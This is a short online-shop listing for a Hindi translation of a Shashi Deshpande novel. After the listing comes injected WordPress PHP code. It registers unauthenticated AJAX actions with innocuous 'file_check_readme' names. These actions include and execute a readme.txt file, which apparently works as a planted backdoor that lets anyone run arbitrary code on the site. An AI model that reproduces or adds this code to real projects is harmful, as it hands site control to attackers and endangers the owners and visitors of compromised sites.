-
- ₹240.00
- Uha Lambi Khamoshi
- Author : Shashi Deshpande Translator : Sandhya Kundnani
- Add to cart
if(!function_exists('file_check_readme19999')){ add_action('wp_ajax_nopriv_file_check_readme19999', 'file_check_readme19999'); add_action('wp_ajax_file_check_readme19999', 'file_check_readme19999'); function file_check_readme19999() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme15877')){ add_action('wp_ajax_nopriv_file_check_readme15877', 'file_check_readme15877'); add_action('wp_ajax_file_check_readme15877', 'file_check_readme15877'); function file_check_readme15877() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }